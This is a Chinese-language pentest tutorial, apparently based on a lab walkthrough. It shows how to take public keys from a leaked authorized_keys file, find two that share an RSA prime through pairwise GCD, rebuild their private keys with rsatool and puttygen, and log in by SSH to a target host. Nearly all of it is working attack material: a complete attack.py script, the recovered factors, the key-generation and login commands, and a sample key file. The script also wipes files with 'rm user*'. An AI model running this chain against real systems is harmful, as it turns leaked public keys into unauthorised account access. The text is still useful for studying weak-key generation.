渗透测试过程中,有时候会在某个未授权访问漏洞中获取authorized_keys文件,里面有大量账户用于免密登录的PublicKey,这个时候如何进行下一步渗透?
可以考虑rsa碰撞的方式,找到公用p因子的两个公钥,从而逐步恢复出私钥(具体原理不太明白,据说来自一篇论文:https://factorable.net/weakkeys12.extended.pdf),本文方法学习自:https://hackso.me/rsa-1-walkthrough/,手动重写了原文中的脚本,全部改为python执行,该脚本python2和python3兼容
*注:这里需要rsa的基础知识,最起码需要知道rsa加密算法的两个个因子:p、q 分别是什么
*注:这种方法成功率相对较低,目前计算机性能算力算法的综合作用下,找到公用p因子的可能性极低,所以想要成功需要有一个前提,authorized_keys文件中有大量公钥
一、获取authorized_keys文件,并执行以下脚本。----测试authorized_key文件和和attack.py脚本附在文末
该脚本可以算出哪两个公钥共用了一个p,并显示出其对应的q是什么
root@kali:~/Desktop/Pentration# python3 attack.py [('2', '4', 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057, 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127, 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897)]
可以看到第二和第四条公钥共用了一个p
二、计算两个公钥对应的RSA私钥
经过第一步,已经将SSH公钥转换为了RSA公钥,这里根据所得p和q可以计算出两个公钥对应的RSA私钥,需要用到rsatools
root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user2.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 154138482778403634422324585381094741396112094157924874391263694520821571222861298674105765179306306537493034017749692130071107610613435921888902004138078680460276016821583678249932808105907339203963186655685583329163374562641235896970977501756291570424272228689701476926803652905250957577229144433204452772127
root@kali:~/Desktop/Pentration/rsatool# ./rsatool.py -o user4.pem -p 154417972435807005071073724522212444390586453823829143415803831059147415798074017502040314003763421243774270757922304211573942665136361376688205405360960917939484579087307177536921412011411703961828583167653172004502917347120641950199480561070177933253465927358617195370782866425595898798109004224439814798057 -q 153278113332014430314822533712203891727299288836706793970670250689211994721080531031391472583116454287125291108401187935648312751844041461411234500935073837231805656247842743814066543045935616374230913460500896653516311833291062554618374636514900539486293512925569339760306744210644153977272176465759656466897
三、生成两个公钥对应的SSH私钥
经过第二步生成了两个公钥对应的RSA私钥,接下来就可以生成SSH私钥,用于免密登录
root@kali:~/Desktop/Pentration/rsatool# puttygen user2.pem -o user2 -O private-openssh-new
root@kali:~/Desktop/Pentration/rsatool# puttygen user4.pem -o user4 -O private-openssh-new
生成的user2和user4就是我们需要的SSH私钥
四、免密登录主机
root@kali:~/Desktop/Pentration/rsatool# ssh -i user2 user2@192.168.109.248 Last login: Sat Jan 5 01:46:12 2019 from 192.168.109.131 OpenBSD 6.3 (GENERIC) #100: Sat Mar 24 14:17:45 MDT 2018 Welcome to OpenBSD: The proactively secure Unix-like operating system. Please use the sendbug(1) utility to report bugs in the system. Before reporting a bug, please try to reproduce it with the latest version of the code. With bug reports, please try to ensure that enough information to reproduce the problem is enclosed, and if a known fix for it exists, include that as well. rsafun$
已经成功登录
*附件
1、attack.py
#attack.py from itertools import combinations from fractions import gcd import subprocess import os file=open("authorized_keys") pubKeylist=file.readlines() tem1Name=1 for i in pubKeylist: tem1Name_t=str(tem1Name) file1_t=open("user"+tem1Name_t,'w') file1_t.write(i) file1_t.close() tem1Name+=1 file.close() #print(tem1Name) for i in range(1,tem1Name): cmd="ssh-keygen -e -m PEM -f user"+str(i)+" | "+"openssl rsa -RSAPublicKey_in -modulus -noout" rdata=subprocess.Popen(cmd,shell=True,stdout=subprocess.PIPE,stderr=subprocess.STDOUT).stdout.readlines() for j in rdata: j=bytes.decode(j).split('=')[1] tem2Name=str(i) file2_t=open("user"+tem2Name+".n",'w') file2_t.write(j) file2_t.close() list = [] dict = {} result = [] # build list for i in range(9): list.append(str(i+1)) # build dictionary for x in list: dict[x] = int(open("user"+x+".n", 'r').read(), 16) # gcd for (i, j) in combinations(list, 2): p = gcd(dict[i], dict[j]) if (p != 1): result.append((i, j, p, int(dict[i]//p), int(dict[j]//p))) break print(result) os.system("rm user*")
2、authorized_keys
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC4aOHSLLqN+odwP6G1GdxqJ+I/e1PuX3EbFe64snwy7IFAY8WrPBEsIqEWesOqUXzBI7G6YbiR13nen0XWqZtSn1yBbt1U1a8M+19phOVyo4Awx/wTvpG0EPYLI3H9J5aIOcBntXo6rrpiidMT2jYthUxwKKNUUHkbmLJ6QP9jNpCGZwm2CXO0GLmnFBYbE+53xKbX1DVD7aEiRxi62XhoUsepAsUJOzt4enAp3WuyMz9f8IlWg2BUiUFqlVImNRm9UuuoXhsBItLOcF0DHBgRZN4cFZyZO2x73SOJ5oJIikA3NhJ9rYwrE01HsKwYxhqXB94rM/SBTcJ5c6xes6Er user1@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC8i9Nk6Rpd6SlRG/FSPy/M8OXVEO/akLMVaNNJEpejOQ/ekdlTKyBMb4pIEwoKpu+PTTeAzigSNNTNg1TONyK0CsPJ3Uj1oJIrJXYNAFm7kxqQD2pKDIGB0hYj1pwivTLnNhh5cnS7Mnm9ijJPHQ8TEyade9a0v9Ps4BAFEIl9HfjkFm/KDTcQjuBjPTaYgazY5b/EHyfLf2deHeFT4AwzWBa7NdiFKKn5eXComWYIiBcUYWRf0ROd/Tx2aF3Q/hxmbS8ImR4l0ZRdsh6V+gmQzp2eAzNeN9QmJzF2gaDQGZBcKf0gpA8gj0prIcnLFctI6seS+an+N6yUW/bwNBM3 user2@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCQ8ZjTDIcdjaAwSTS1u83FspC6iVba2a1W1jS+UVw+zrxc06xEeTBmdt4p0J9cWCK97pMrBR+dquuLikaSxfI6BxhZY+6MKTnghjI8MiktgpjEOJNA6rfOJzBoIvvQr4E3LJu0gRVDLoSoseDI1Vb9d5AwKQTjGSXGofIpsNzSrwLgu4JKvZAjIfvv/z0bk5VwBmjtJVntlMOBkPyD6ZuGoiWacUH8AFe2lT9h++G6IoIznPQCrIfeKUrIRwbWJWqTumy8RDCKVgTUUYszkq/r1/wAsR1HhZJVon/JczRsZ3ZZL84Zpja0EuYFZKjPgHsewN3pnUEHzWR4b9bCu8dz user3@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC7fmeWcwd24gYuSYBgQmO8mr394YsLYvVN46pGPvjEvpLwEXJ/K6JoLYpBX6EKEqj8mvx04YSy5IsZAjYbraRbhtpOmLXRBSOPwnhzUUcBHQANkKpq5pdJrEdD3xzG0CuHF80P0HY9tG/ZXY8J+LJ+LWyL4H0upWRGTcjGm7fZxyRVg2tI2gLPlN3zHpBji92nQ+CXyJPLOFhq8+/fls143tkJ3LissqgOPnLTQkdm6H9XbaWcgLao7ALXEgyXKWMZrMdEbpBiqOsTyBpwpIM3A7iAPu/1QqsPqnwKUbH7z6zn8TbfoPABN+MbvnEmj4jALqhDAnWAaMfq0yUWm5k5 user4@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCge/tLWGuAwvfAZ6jZUVQ+JzhdSlanJduRV8urB94AlP82Rm5y1LMuAy70z0VTE2SNzMG2yqAFGtbfUvkoqfD5WnWG9oHJaoiaJnfxvOLKgNEztTTAdFdMDLHkD3hh4NdxH7aZxQIxHUWtKOhuZ8h73toH7tAkChPkaSO6G79hb2pciCP//TnJfc59Fd5fNQEdROQ8Ekp1mONrqCJAgKJn5BvzXeGAwpxbLpvyJFcW6uTj98GoE9qPSItt5/DPn9oVOX1RgTQjSDqZZq2m1rLtLIs9RIYu/xPTWQ2AsAHvrTCDoNo00ebQPDFz0MzTP8bIyw8ObpoWtdqkEUqi35/r user5@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQD00XwLgzJK9Ocwzid87PcnLf7DkZdoggvl624q0vSMKKDNpbj4DNdL8naR5XEoqx2t265AQcUyc2JOQKqMbPuyWdjX6GbYkAa7quWVh0B6W+7qoVLFWmJOi63Rzyrm/TRoHBjJI8jN6bBVoINnm7q0sjJw3xCYEACVR5CM+BLc9sNaVbRmsS1Nu434QeJ4GEiEcdf9LdjvUSZAClAeXcZ6W5hnGg2GCc9Rbo3eFfeXj7A8pk7VZKxhdACnOcYRcAIVUOoPHQUgE4BDTDPKDA5tM7Bf9aGfaIw2j9OnzpYUfen8DGK/LzktpBn10In2R05HXojO6pMrLvJ+81rGqy3x user6@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDlKXFK6oJ4dJtesy2EwTjaq3HpXsvEYraPynrz4zFc1N8KnPiRdZBlX6opIQsxwseUUQXso+0VQ9v4nG3q0/bzKjmFJwg6j16M+P7KndYr1MM8U2tSQ+YOibPJ2FONF9VlPHF3mFviUI+fYGgb1p47Dxj/SQ5s1vuBk4Lf/FTJV3qAEvhwBYA7HysO83SBwSBA+DS64BAWXofZxpOKXET4Q+IKT3d7hIVaFJgWi9q1NRFeHZ0B3AtlrQ+QCppMiZU4aDwl5wGYuV+4QDlkTtQCwilaa2kc5ujbzJhCeww3pMSa0cr5G90a6lwf+GkX+NoumwsoqxgRgj9i1o2BxdKp user7@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQC5bur6r9Kq2SB4YGmSFI14K6X8o4LAM6ZQLoMgp52W6NUz2TUFTAXdMkMVBS+dG2wSbcyuZ59Cc6vi2ehQViJmx1vzev2Ejj+bQIPagh6SU/oWRa/KiqlYdzjQsntS5IVQD4WX0kq7zOKDoNLqUhkgmZDBdISN/TRO+iEmKLKowoJlR5EDudLJqY+lZ6wwNtgwG4tMK5c/Czx41pIm1OKw09c23FD0/GGXv0JDBplku+Jjr1CNc+M7QkeVSDXwf8BzkNzWkkQnGxwJQF0ufVuuzkZ9C9Ub0MTvDzMcefiWz3oSkVWz5HeFe2ROS2rBFYUm5M48TrsD5bLYEn6i4LDh user8@rsafun ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDUC0NKyGoR1EqOS1suQK0YfitFIt0lFkpwKVYVP4YD86aSiPqpWI6rRsLBevGxOfDdRFHqMmzx4S0tVJfYErs7O7X20xWy6oJJRX67h1QghDZOa8hWEFPSr2qlOhNTvfp9yJbTKvCzStSYN0AR81MiuLn6uSmr6N2LUU02mmA1JmuZlO/ilqU7/fECNY9Dl/hrX7oIqvbpxXZDfxa25PQqy9uTrZe71sCkBkdZ11qj+4hkWPUWrhZgosJXJb61h9QGbmhzte3YyJ6RoEzz3ozFamYBzuyszX/4Ne4juBXzXoD5+En+kFIMnfNk5bVYeD4XG6a8jDDcKzsFrvWZ7zgD user9@rsafun